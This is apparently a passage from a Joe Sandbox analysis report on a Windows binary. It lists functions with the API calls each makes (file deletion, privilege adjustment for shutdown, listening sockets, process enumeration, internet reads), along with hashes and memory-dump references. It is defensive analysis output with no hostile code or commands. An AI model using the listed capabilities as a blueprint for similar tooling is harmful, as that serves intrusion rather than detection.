                                                    • Instruction ID: 62a4befc3d50fca233dd75e9e45c91f0e864969453d30d9d066005e23fa4e895
                                                    • Opcode Fuzzy Hash: 0c0fb41be119c0e5ffa04f8587cc3f67b6e073da4818846d0566cec115c1b4db
                                                    • Instruction Fuzzy Hash: 93619B706083129FC760DF24C848FAAB7EAEF49714F04481DF9869B291CB70ED49CB92
                                                    Function 006C4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: ba9f8263d3521a27e9451ffd0b053d70750feaafe0e632a749e8ddae2885db53
                                                    • Instruction ID: 9464fb13cd7aa73cca7f8844b79c0f73f75c65db69974366d6f9a3f2abe6d820
                                                    • Opcode Fuzzy Hash: ba9f8263d3521a27e9451ffd0b053d70750feaafe0e632a749e8ddae2885db53
                                                    • Instruction Fuzzy Hash: F721AB35A012109FDB10AF64EC19F7A7BAAEF44761F14802AF946DB2A1CB34ED01CB58
                                                    Function 006B37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                      • Part of subcall function 006B4A31: GetFileAttributesW.KERNEL32(?,006B370B), ref: 006B4A32
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006B38A3
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006B394B
                                                    • MoveFileW.KERNEL32(?,?), ref: 006B395E
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006B397B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006B399D
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006B39B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: 79fbda9ad83e0cc977186b1a2ddaf4dfefad248d14af08af0a05690f8026f0f6
                                                    • Instruction ID: 4e109a33123d595f0104bb070e4f25f6aa44a43bfd5e90d59326018ffe63f5e1
                                                    • Opcode Fuzzy Hash: 79fbda9ad83e0cc977186b1a2ddaf4dfefad248d14af08af0a05690f8026f0f6
                                                    • Instruction Fuzzy Hash: 93518E7190515CAACF11FBA0D9929EDB77AAF14301F60016DE802B72A2EF316F4DCB65
                                                    Function 006BF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006BF440
                                                    • Sleep.KERNEL32(0000000A), ref: 006BF470
                                                    • _wcscmp.LIBCMT ref: 006BF484
                                                    • _wcscmp.LIBCMT ref: 006BF49F
                                                    • FindNextFileW.KERNEL32(?,?), ref: 006BF53D
                                                    • FindClose.KERNEL32(00000000), ref: 006BF553
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    • Opcode ID: 46dddebbfd059e30b399d2f0aa04860a2fdacb4f3cfa97087fbbef0634809b4b
                                                    • Instruction ID: 9213b265225ff31958821a5adc805e977aea1b3c01826f1d7ce62ef20945c1e8
                                                    • Opcode Fuzzy Hash: 46dddebbfd059e30b399d2f0aa04860a2fdacb4f3cfa97087fbbef0634809b4b
                                                    • Instruction Fuzzy Hash: D54180B290021A9FCF60DF64DC45AEEBBB6FF15310F14456AE815A32A1DB309E95CF50
                                                    Function 00663030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID: 3cf$_f
                                                    • API String ID: 674341424-1617663849
                                                    • Opcode ID: 6b9bb71e90b0b2149116546ab65b1c82ade82b40579d8b221b7db4d20cd39dbd
                                                    • Instruction ID: 313aa3de88667e8332490b3f98fa28c85062342c1f6d2ca545c70e73dcb8a3b3
                                                    • Opcode Fuzzy Hash: 6b9bb71e90b0b2149116546ab65b1c82ade82b40579d8b221b7db4d20cd39dbd
                                                    • Instruction Fuzzy Hash: B322AE716083109FCB64DF24C891BAEB7E6AF84310F04491DF89A97391DB31EE09CB96
                                                    Function 00665760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: bd3c0f218a0f28516c94bf6b873662f2c4020d297828458b88db8591f55deca7
                                                    • Instruction ID: faa0bc69d78fbffdc0a4a83f6255c8a8ecb9719273cd7c529be8e61581dd27dc
                                                    • Opcode Fuzzy Hash: bd3c0f218a0f28516c94bf6b873662f2c4020d297828458b88db8591f55deca7
                                                    • Instruction Fuzzy Hash: 6A128B70A00609DFDF14DFA5D982AEEB7F6FF48300F108669E806A7251EB35AD15CB64
                                                    Function 006B51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
                                                      • Part of subcall function 006A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
                                                      • Part of subcall function 006A87E1: GetLastError.KERNEL32 ref: 006A8865
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 006B51F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 4524dc64e6fd75452cd6e099f267b2d8c1bc94e4f3e595df6662237b668ce700
                                                    • Instruction ID: 88dfb7b03bac580494d9a5f88bfe44fd8f9119009049afcba5d31ec85a55c661
                                                    • Opcode Fuzzy Hash: 4524dc64e6fd75452cd6e099f267b2d8c1bc94e4f3e595df6662237b668ce700
                                                    • Instruction Fuzzy Hash: 0701FCF17A36115FE73863689C9BFFA735A9B05340F140425F943D21D2D9715D814794
                                                    Function 006C6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006C62DC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C62EB
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 006C6307
                                                    • listen.WSOCK32(00000000,00000005), ref: 006C6316
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C6330
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 006C6344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 8382040b6e972d40cbdd87f8c00abb2a407e5637915f0aca05b7c4748d9bb03e
                                                    • Instruction ID: 580f11c6a6410e1701128820e48fb81e93374c6923b21078d8f27ca014f41b2d
                                                    • Opcode Fuzzy Hash: 8382040b6e972d40cbdd87f8c00abb2a407e5637915f0aca05b7c4748d9bb03e
                                                    • Instruction Fuzzy Hash: 66218D31A002049FCB10EF64D849FBEB7AAEF49721F14855DF81AA7391C770AD05CB65
                                                    Function 00665520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                    • _memmove.LIBCMT ref: 006A0258
                                                    • _memmove.LIBCMT ref: 006A036D
                                                    • _memmove.LIBCMT ref: 006A0414
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1300846289-0
                                                    • Opcode ID: fa6bdc3e1dc6847b373774702625b9f4d8659293861a8a853800385639fc8351
                                                    • Instruction ID: 93a1c9367d7ef38b2598daebae4e293370885df9549949f0d1410b39e5c64eb0
                                                    • Opcode Fuzzy Hash: fa6bdc3e1dc6847b373774702625b9f4d8659293861a8a853800385639fc8351
                                                    • Instruction Fuzzy Hash: 7802CF70A00209DFDF04DF64D982AAEBBB6EF45300F1480A9E80ADB391EB35DD55CB95
                                                    Function 00651287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 006519FA
                                                    • GetSysColor.USER32(0000000F), ref: 00651A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 00651A61
                                                      • Part of subcall function 00651290: DefDlgProcW.USER32(?,00000020,?), ref: 006512D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 5957d3b5d40ed824244135c5e9b9f22d59d0700f308233e4e3d8dd75249cd476
                                                    • Instruction ID: d88f879618d14db445c80d3dfd4ca8c164d864869e7b32beb1e9353cca54f8f2
                                                    • Opcode Fuzzy Hash: 5957d3b5d40ed824244135c5e9b9f22d59d0700f308233e4e3d8dd75249cd476
                                                    • Instruction Fuzzy Hash: 3DA12474102585BAEB29AB288C55FFB255FDB43343F14421EF802D93D2DA248D0AD3BA
                                                    Function 006C6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006C7DB6
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006C679E
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C67C7
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 006C6800
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C680D
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 006C6821
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 19114121a588f70f3aa8979a30cb74b699dad3d73ef76ac494fce8bcd8f10026
                                                    • Instruction ID: 1192a45eb53412dbdd86a8cde048eb813e3bc28bbb22d123118d8e571fa0af36
                                                    • Opcode Fuzzy Hash: 19114121a588f70f3aa8979a30cb74b699dad3d73ef76ac494fce8bcd8f10026
                                                    • Instruction Fuzzy Hash: 6F41AF75A00200AFEB90AF24CC86F7E77AADF45714F04855CFD56AB3D2CA709D048BA5
                                                    Function 006D5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 3284df5f321eb014a7f4668a83f7c6a6e6651f9e1b5254f649b0330afe9c0389
                                                    • Instruction ID: f9a3abc939944ba33ad5d21a054bf7f247e460689df252be636972ab1bf214e1
                                                    • Opcode Fuzzy Hash: 3284df5f321eb014a7f4668a83f7c6a6e6651f9e1b5254f649b0330afe9c0389
                                                    • Instruction Fuzzy Hash: 11110431B019106FDB206F26DC44AAE7B9BEF843A1B01442AF847D7741DBB0DD018AA4
                                                    Function 006A80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006A80C0
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006A80CA
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006A80D9
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006A80E0
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006A80F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 2fbd7342c8f1566b9790ef255cbf66001a55b1e40a61be4e4cef423c0f30f477
                                                    • Instruction ID: e292b26cc9cd01f714c7e5909f9fb3913f7de6e0a1b7302e0b219f6319606145
                                                    • Opcode Fuzzy Hash: 2fbd7342c8f1566b9790ef255cbf66001a55b1e40a61be4e4cef423c0f30f477
                                                    • Instruction Fuzzy Hash: DBF06231641205AFEB101FA5EC8DEA73BBEEF4A755B040026F946C7250CB619D51DEA0
                                                    Function 00654B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00654AD0), ref: 00654B45
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00654B57
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: db0e6ffb52e31530759999aa7eababe4ffac11945022ef3cdc3bd07a902e27df
                                                    • Instruction ID: 98fd411db6ec72ac7758346b16426b9f8c5d4b3941ae9d3efa64bcda3016fb90
                                                    • Opcode Fuzzy Hash: db0e6ffb52e31530759999aa7eababe4ffac11945022ef3cdc3bd07a902e27df
                                                    • Instruction Fuzzy Hash: B4D01734E10713CFD7209F32EC28B4676E6AF05396F16887B9897D6250EBB0E8C4CA54
                                                    Function 006CEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 006CEE3D
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 006CEE4B
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 006CEF0B
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 006CEF1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: fed7e8a1486e838ad23f6c22cd94452fb5168b525ec6d4f3bfc609c799bc4c8d
                                                    • Instruction ID: 8669c85d259f1493cb1e61db31d917d64afe7c9e48c6f8b439678f9cc70d44a8
                                                    • Opcode Fuzzy Hash: fed7e8a1486e838ad23f6c22cd94452fb5168b525ec6d4f3bfc609c799bc4c8d
                                                    • Instruction Fuzzy Hash: 9C51AD71504301AFD350EF20DC85EABB7E9EF88750F10492DF996972A1EB70E908CB96
                                                    Function 006AE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006AE628
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: cb9cdd3ec9572cb723df8eb2d53577cc5edc9488a1bb1186039745afbab3e2f4
                                                    • Instruction ID: e66f5e554d7432aaa53a42efc8a44edadfe5014f93957e4df229970a7cf537a7
                                                    • Opcode Fuzzy Hash: cb9cdd3ec9572cb723df8eb2d53577cc5edc9488a1bb1186039745afbab3e2f4
                                                    • Instruction Fuzzy Hash: 1C323375A007019FDB28DF59C4809AAB7F2FF48320B15C46EE89ACB3A1E771E941CB54
                                                    Function 006C22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006C180A,00000000), ref: 006C23E1
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006C2418
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
